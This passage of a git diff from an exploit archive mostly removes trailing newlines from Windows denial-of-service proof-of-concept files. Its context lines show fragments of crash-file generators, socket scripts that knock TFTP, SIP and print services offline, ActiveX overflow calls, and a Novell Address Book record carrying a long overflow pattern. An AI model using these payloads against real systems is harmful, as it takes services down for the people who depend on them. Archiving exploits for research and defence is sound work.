d.createElement("input"))){try{d.getElementById("yschsp").focus();}catch(e){}}data={"assist":{"url":"http:\/\/www.google.com","maxLength":38,"linkStem":"http:\/\/www.remoteshell.de","settingsUrl":"http:\/\/www.chrooome.xxx","strings":{"searchbox_title":"bam","settings_text":"bam","gossip_desc":"bam","scroll_up":"bam","scroll_down":"bam","aria_available_suggestions":"bam","aria_no_suggestion_available":"bam"}}};window.onload=function(){var h=d.getElementsByTagName("head")[0],o=d.createElement("script");o.src="http://www.0__o";h.appendChild(o);};}());</script> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/18028.py b/platforms/windows/dos/18028.py index 44277c613..f09f40a21 100755 --- a/platforms/windows/dos/18028.py +++ b/platforms/windows/dos/18028.py @@ -86,6 +86,4 @@ def main(): sys.exit(0) if __name__ == '__main__': - main() - - + main() \ No newline at end of file diff --git a/platforms/windows/dos/18049.txt b/platforms/windows/dos/18049.txt index 4d1318851..821079b14 100755 --- a/platforms/windows/dos/18049.txt +++ b/platforms/windows/dos/18049.txt @@ -73,4 +73,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/18078.txt b/platforms/windows/dos/18078.txt index 3a767e56d..fa2ba3dc1 100755 --- a/platforms/windows/dos/18078.txt +++ b/platforms/windows/dos/18078.txt @@ -107,4 +107,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/18106.pl b/platforms/windows/dos/18106.pl index 808d29b1c..afeb34b7e 100755 --- a/platforms/windows/dos/18106.pl +++ b/platforms/windows/dos/18106.pl @@ -42,4 +42,4 @@ print "\n\n[*] Creating $file file...\n"; open ZSL, ">./$file" || die "\nCan't open $file: $!"; print ZSL $tovar; print "\n[.] File successfully mounted!\n\n"; -close ZSL; +close ZSL; \ No newline at end of file diff --git a/platforms/windows/dos/18107.py b/platforms/windows/dos/18107.py index 7b060967d..b4fa6f5d7 100755 --- a/platforms/windows/dos/18107.py +++ b/platforms/windows/dos/18107.py @@ -34,7 +34,4 @@ try: f.write(ogg) f.close() except: - print('\nError while creating ogg file\n') - - - + print('\nError while creating ogg file\n') \ No newline at end of file diff --git a/platforms/windows/dos/18112.txt b/platforms/windows/dos/18112.txt index 3bb33658b..03d28fd25 100755 --- a/platforms/windows/dos/18112.txt +++ b/platforms/windows/dos/18112.txt @@ -101,4 +101,4 @@ B] No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/18119.rb b/platforms/windows/dos/18119.rb index 8f7688e51..e9ddd7bf7 100755 --- a/platforms/windows/dos/18119.rb +++ b/platforms/windows/dos/18119.rb @@ -131,4 +131,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/dos/18140.c b/platforms/windows/dos/18140.c index 641060fbe..6fb756a3c 100755 --- a/platforms/windows/dos/18140.c +++ b/platforms/windows/dos/18140.c @@ -283,5 +283,4 @@ int _tmain(int argc, _TCHAR* argv[]) return 0; -}// - +}// \ No newline at end of file diff --git a/platforms/windows/dos/18165.txt b/platforms/windows/dos/18165.txt index 311559e74..59abb88db 100755 --- a/platforms/windows/dos/18165.txt +++ b/platforms/windows/dos/18165.txt @@ -141,4 +141,4 @@ D] No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/18166.txt b/platforms/windows/dos/18166.txt index fe2547ebe..7543e5c36 100755 --- a/platforms/windows/dos/18166.txt +++ b/platforms/windows/dos/18166.txt @@ -231,4 +231,4 @@ E] No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/18188.txt b/platforms/windows/dos/18188.txt index 7bb2af7cc..b45cc9449 100755 --- a/platforms/windows/dos/18188.txt +++ b/platforms/windows/dos/18188.txt @@ -128,5 +128,4 @@ try: sock.connect() except: print "Remote TFTP server port is down..." - sys.exit(1) - + sys.exit(1) \ No newline at end of file diff --git a/platforms/windows/dos/18196.py b/platforms/windows/dos/18196.py index a98c53f70..9b920d65a 100755 --- a/platforms/windows/dos/18196.py +++ b/platforms/windows/dos/18196.py @@ -65,4 +65,4 @@ except socket.error: - + \ No newline at end of file diff --git a/platforms/windows/dos/18200.txt b/platforms/windows/dos/18200.txt index ecab94910..97226cee2 100755 --- a/platforms/windows/dos/18200.txt +++ b/platforms/windows/dos/18200.txt @@ -122,4 +122,4 @@ print "\n\n[*] Creating $fname file...\n"; open ENOUGH, ">./$fname" || die "\nCan't open $fname: $!"; print ENOUGH $payload; print "\n"; sleep 1; print "\n[.] File successfully scripted!\n\n"; -close ENOUGH; +close ENOUGH; \ No newline at end of file diff --git a/platforms/windows/dos/18220.py b/platforms/windows/dos/18220.py index f4d8630be..c106305af 100755 --- a/platforms/windows/dos/18220.py +++ b/platforms/windows/dos/18220.py @@ -278,4 +278,4 @@ while a < 2: #0012c8e8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. #0012c8f8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. #0012c908 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. -# +# \ No newline at end of file diff --git a/platforms/windows/dos/18223.pl b/platforms/windows/dos/18223.pl index 0829b8cb6..c19cd85d4 100755 --- a/platforms/windows/dos/18223.pl +++ b/platforms/windows/dos/18223.pl @@ -16,4 +16,4 @@ open($FILE,">$file"); print $FILE $junk.$junk2; close($FILE); -print "File Created successfully\n"; +print "File Created successfully\n"; \ No newline at end of file diff --git a/platforms/windows/dos/18254.pl b/platforms/windows/dos/18254.pl index 0ab8654cb..13109d299 100755 --- a/platforms/windows/dos/18254.pl +++ b/platforms/windows/dos/18254.pl @@ -14,4 +14,4 @@ open($FILE,">$file"); print $FILE $junk; print "\nCrash.mp3 File Created successfully\n"; print "\ Dz-Devloper Work Team (Ahmadso best friend)\n"; -close($FILE); +close($FILE); \ No newline at end of file diff --git a/platforms/windows/dos/18256.txt b/platforms/windows/dos/18256.txt index c293a82a6..eb3f3df17 100755 --- a/platforms/windows/dos/18256.txt +++ b/platforms/windows/dos/18256.txt @@ -64,5 +64,4 @@ NULL after freeing them, which can be exploited to cause a double-free condition 4) The Code ============= https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18256.fpx -http://www.protekresearchlab.com/exploits/PRL-2011-11.fpx - +http://www.protekresearchlab.com/exploits/PRL-2011-11.fpx \ No newline at end of file diff --git a/platforms/windows/dos/18257.txt b/platforms/windows/dos/18257.txt index 61f4f0d82..27260ce7d 100755 --- a/platforms/windows/dos/18257.txt +++ b/platforms/windows/dos/18257.txt @@ -67,4 +67,4 @@ image file. ============= https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18257.tif -http://www.protekresearchlab.com/exploits/PRL-2011-10.tif +http://www.protekresearchlab.com/exploits/PRL-2011-10.tif \ No newline at end of file diff --git a/platforms/windows/dos/18285.py b/platforms/windows/dos/18285.py index dbe0ba7d7..8b6d77b2b 100755 --- a/platforms/windows/dos/18285.py +++ b/platforms/windows/dos/18285.py @@ -65,4 +65,4 @@ f = open('vlc-dos.ape', 'wb') f.write( binascii.unhexlify(hexlified) ) f.close() -print '[*] Vulnerable file, vlc-dos.ape, created' +print '[*] Vulnerable file, vlc-dos.ape, created' \ No newline at end of file diff --git a/platforms/windows/dos/18337.pl b/platforms/windows/dos/18337.pl index 85f8f6cbb..321755292 100755 --- a/platforms/windows/dos/18337.pl +++ b/platforms/windows/dos/18337.pl @@ -16,4 +16,4 @@ print "\nCrash.mp3 File Created successfully\n"; print "\ I'am From Tunisia (Ahmadso best Friend)\n"; print "\ Dz-Devloper Work Team (wanted_29 Dr.Smt z4k!_xy ak27 DR.KIM Samoray Mr_Ghost)\n"; -close($FILE); +close($FILE); \ No newline at end of file diff --git a/platforms/windows/dos/18339.py b/platforms/windows/dos/18339.py index d4f4db0ea..a2b6bebd5 100755 --- a/platforms/windows/dos/18339.py +++ b/platforms/windows/dos/18339.py @@ -15,4 +15,4 @@ print "[*] Creating crash file...\n"; writeFile = open (file, "w") writeFile.write(junk) writeFile.close() -print "[*] File successfully created!\n\n"; +print "[*] File successfully created!\n\n"; \ No newline at end of file diff --git a/platforms/windows/dos/1838.html b/platforms/windows/dos/1838.html index d8c27945c..3db6322fe 100755 --- a/platforms/windows/dos/1838.html +++ b/platforms/windows/dos/1838.html @@ -21,4 +21,4 @@ </h2> </dir> </ul> -# milw0rm.com [2006-05-27] +# milw0rm.com [2006-05-27] \ No newline at end of file diff --git a/platforms/windows/dos/18427.txt b/platforms/windows/dos/18427.txt index 1febc10ff..827b3677d 100755 --- a/platforms/windows/dos/18427.txt +++ b/platforms/windows/dos/18427.txt @@ -125,4 +125,4 @@ arg2=String(14356, "A") zsl.InitFromRegistry arg1 ,arg2 -</script> +</script> \ No newline at end of file diff --git a/platforms/windows/dos/18440.txt b/platforms/windows/dos/18440.txt index 7315e941e..448d7d29c 100755 --- a/platforms/windows/dos/18440.txt +++ b/platforms/windows/dos/18440.txt @@ -102,4 +102,4 @@ arg2=String(4116, "A") ZSL.FtpUploadFile arg1 ,arg2 -</script> +</script> \ No newline at end of file diff --git a/platforms/windows/dos/18453.txt b/platforms/windows/dos/18453.txt index e4d22bac8..c7526bc39 100755 --- a/platforms/windows/dos/18453.txt +++ b/platforms/windows/dos/18453.txt @@ -142,5 +142,4 @@ try: except: print "OfficeSIP server port is down." print "Service not responding ...." - sys.exit(1) - + sys.exit(1) \ No newline at end of file diff --git a/platforms/windows/dos/18454.txt b/platforms/windows/dos/18454.txt index 201643627..8a29efdae 100755 --- a/platforms/windows/dos/18454.txt +++ b/platforms/windows/dos/18454.txt @@ -131,4 +131,4 @@ try: except: print "\n[-] Xlpd service is crashed, unble to connect" -sys.exit(0) +sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/dos/18469.pl b/platforms/windows/dos/18469.pl index ef2021e6a..61d45502e 100755 --- a/platforms/windows/dos/18469.pl +++ b/platforms/windows/dos/18469.pl @@ -103,4 +103,4 @@ $socket->send($user); $socket->recv($serverdata, 1024); $socket->send($passw); $socket->recv($serverdata, 1024); -$socket->send($command.$dos_input.$send); +$socket->send($command.$dos_input.$send); \ No newline at end of file diff --git a/platforms/windows/dos/18475.c b/platforms/windows/dos/18475.c index 9715e4e27..0c6afdc69 100755 --- a/platforms/windows/dos/18475.c +++ b/platforms/windows/dos/18475.c @@ -68,5 +68,4 @@ reNP52yJzbcxdxrAVA/GazE5QhqR0eLIf/oq27Lm1Zma/ZRD1B6h50W5nX8zOgzd CW5S6xKQpQRytRDfqrGhYAnaHnGlGTmmhQ4rW9twiV8Ygn6Rz8SM9KmkTzM2P55t +PizKEH12PrXQX8t3GNc =Sbvp ------END PGP SIGNATURE----- - +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/windows/dos/18488.txt b/platforms/windows/dos/18488.txt index ab54e0db2..954f9a414 100755 --- a/platforms/windows/dos/18488.txt +++ b/platforms/windows/dos/18488.txt @@ -91,4 +91,4 @@ nmma_x 3 SERVER No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/18489.txt b/platforms/windows/dos/18489.txt index 1c6dc156c..013e9a7e1 100755 --- a/platforms/windows/dos/18489.txt +++ b/platforms/windows/dos/18489.txt @@ -87,4 +87,4 @@ nmma_x 1 SERVER No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/18490.txt b/platforms/windows/dos/18490.txt index 2bdf28d49..0c3b52c21 100755 --- a/platforms/windows/dos/18490.txt +++ b/platforms/windows/dos/18490.txt @@ -80,4 +80,4 @@ where is located the nim_1.nmx file: No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/18491.txt b/platforms/windows/dos/18491.txt index b351ce4d6..333e22aa7 100755 --- a/platforms/windows/dos/18491.txt +++ b/platforms/windows/dos/18491.txt @@ -208,4 +208,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/18512.txt b/platforms/windows/dos/18512.txt index 2b0faabd3..bebbe42a7 100755 --- a/platforms/windows/dos/18512.txt +++ b/platforms/windows/dos/18512.txt @@ -70,4 +70,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/18541.py b/platforms/windows/dos/18541.py index 9ff53b25f..6d61b6cca 100755 --- a/platforms/windows/dos/18541.py +++ b/platforms/windows/dos/18541.py @@ -143,6 +143,4 @@ print "HTTP GET request with long filename triggers the vulnerability" data = exploit sock.sendto(data, (target, port)) time.sleep(5) -print "[+] Please verify the server daemon port, it must be down...." - - +print "[+] Please verify the server daemon port, it must be down...." \ No newline at end of file diff --git a/platforms/windows/dos/18546.txt b/platforms/windows/dos/18546.txt index e108abd57..3dbe11f31 100755 --- a/platforms/windows/dos/18546.txt +++ b/platforms/windows/dos/18546.txt @@ -77,4 +77,4 @@ User must open a malformed Novell Address Book (*.NAB) with an overly long email :::TAGMAP:::0FFE0003:***,3001001F:Name,3A06001F:First Name,3A44001F:Middle Name,3A11001F:Last Name,3A45001F:Prefix,3A05001F:Suffix,3003001F:E-Mail Address,3A56101F:E-Mail Addresses,3A00001F:User ID,6605001F:Post Office,6604001F:Domain,660D001F:Internet Domain,6609001F:Additional Routing,660C0003:E-Mail Address Format,6603001F:GUID,66060003:File ID,6608001F:Network ID,6607001F:eDirectory Distinguished Name,3004001F:Comments,660E001F:AIM/IM Screen Name,6610101F:IM Addresses,3A1A001F:Phone Number,3A08001F:Office Phone,3A09001F:Home Phone,3A1C001F:Mobile Phone,3A23001F:Fax Number,3A21001F:Pager Number,3A29001F:Office Street,3A19001F:Mailstop,3A27001F:Office City,3A28001F:Office State,3A2A001F:Office Postal Code,3A260000:Office Country,3A5D001F:Home Street,3A59001F:Home City,3A5C001F:Home State,3A5B001F:Home Postal Code,3A5A001F:Home Country,3A17001F:Title,3A18001F:Department,3A16001F:Organization,3A51001F:Office Website,3A50001F:Personal Website,3A42001F:Birthday,6612001F:Resource Type,6614101F:Category,600C0003:Last Reference,600D0003:Reference Count,660A0003:Version#,3A41001F:Wedding Anniversary,3A48001F:Spouse,3A4F001F:Nickname,6617001F:User Field 1,6618001F:User Field 2,6619001F:User Field 3,661A001F:User Field 4,3A0D001F:Location,3A10001F:Organizational ID,3A46001F:Profession,3A4A001F:Customer ID,3A07001F:Government ID,3A4E001F:Manager,661B001F:Internet Free/Busy,3A30001F:Assistant,3A02001F:Callback Phone,3A1B001F:Business 2 Phone,3A1D001F:Radio Phone,3A1E001F:Car Phone,3A1F001F:Other Phone,3A2C001F:Telex Phone,3A2D001F:ISDN Phone,3A2E001F:Assistant Phone,3A2F001F:Home 2 Phone,3A24001F:Other Fax,3A25001F:Home Fax,3A4B001F:TTY/TDD Phone,3A57001F:Company Phone,3A63001F:Other Street,3A5F001F:Other City,3A62001F:Other State,3A61001F:Other Postal Code,3A60001F:Other Country,3A64001F:Other PO Box,661D001F:Mailing Street,661E001F:Mailing City,661F001F:Mailing State,6620001F:Mailing Postal Code,6621001F:Mailing Country,6622001F:Mailing PO Box,3A5E001F:Home PO Box,3A2B001F:Office PO Box,3A4C001F:FTP Site,3A49001F:Computer Network Name,661C001F:Mileage,3A58101F:Children,3A43001F:Hobbies "U","francis",,,"francis,,,"francis@protekresearchlab.com","Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8FDCBA0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2Gr3Gr4Gr5Gr6Gr7Gr8Gr9Gs0Gs1Gs2Gs3Gs4Gs5Gs6Gs7Gs8Gs9Gt0Gt1Gt2Gt3Gt4Gt5Gt6Gt7Gt8Gt9Gu0Gu1Gu2Gu3Gu4Gu5Gu6Gu7Gu8Gu9Gv0Gv1Gv2Gv3Gv4Gv5Gv6Gv7Gv8Gv9Gw0Gw1Gw2Gw3Gw4Gw5Gw6Gw7Gw8Gw9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy7Gy8Gy9Gz0Gz1Gz2Gz3Gz4Gz5Gz6Gz7Gz8Gz9Ha0Ha1Ha2Ha3Ha4Ha5Ha6Ha7Ha8Ha9Hb0Hb1Hb2Hb3Hb4Hb5Hb6Hb7Hb8Hb9Hc0Hc1Hc2Hc3Hc4Hc5Hc6Hc7Hc8Hc9Hd0Hd1Hd2Hd3Hd4Hd5Hd6Hd7H